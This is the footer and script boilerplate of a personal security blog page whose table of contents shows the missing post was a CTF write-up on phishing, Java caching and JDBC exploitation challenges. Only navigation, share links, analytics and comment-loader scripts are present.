        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a href="/tags/">Tag</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/link/">Friends</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6"><span class="toc-number">1.</span> <span class="toc-text">钓鱼邮件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#donntyousee"><span class="toc-number">2.</span> <span class="toc-text">donntyousee</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CachedVisitor"><span class="toc-number">3.</span> <span class="toc-text">CachedVisitor</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JDBCParty"><span class="toc-number">4.</span> <span class="toc-text">JDBCParty</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#jdk17-%E5%8F%8D%E5%B0%84%E5%88%A9%E7%94%A8"><span class="toc-number">4.1.</span> <span class="toc-text">jdk17 反射利用</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://oceanzbz.github.io/post/e5e27309.html"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://oceanzbz.github.io/post/e5e27309.html&text=软件系统安全攻防赛Wp"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://oceanzbz.github.io/post/e5e27309.html&title=软件系统安全攻防赛Wp"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://oceanzbz.github.io/post/e5e27309.html&is_video=false&description=软件系统安全攻防赛Wp"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=软件系统安全攻防赛Wp&body=Check out this article: https://oceanzbz.github.io/post/e5e27309.html"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://oceanzbz.github.io/post/e5e27309.html&title=软件系统安全攻防赛Wp"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://oceanzbz.github.io/post/e5e27309.html&title=软件系统安全攻防赛Wp"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://oceanzbz.github.io/post/e5e27309.html&title=软件系统安全攻防赛Wp"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://oceanzbz.github.io/post/e5e27309.html&title=软件系统安全攻防赛Wp"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://oceanzbz.github.io/post/e5e27309.html&name=软件系统安全攻防赛Wp&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://oceanzbz.github.io/post/e5e27309.html&t=软件系统安全攻防赛Wp"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    Oceanzbz
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/link/">Friends</a></li><!--
     -->
      </ul>
      <ul>
        
          <!-- 不蒜子统计 -->
          <span id="busuanzi_container_site_pv">
              本站总访问量<span id="busuanzi_value_site_pv"></span>次
          </span>
          <span class="post-meta-divider">|</span>
          <span id="busuanzi_container_site_uv" style='display:none'>
                  本站访客数<span id="busuanzi_value_site_uv"></span>人
          </span>
          <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        
      </ul>
    </nav>
  </div>
  <script async src="https://www.googletagmanager.com/gtag/js?id=G-QWTJSPQL4F"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-QWTJSPQL4F');
</script>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'cactus-1';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

</body>
</html>
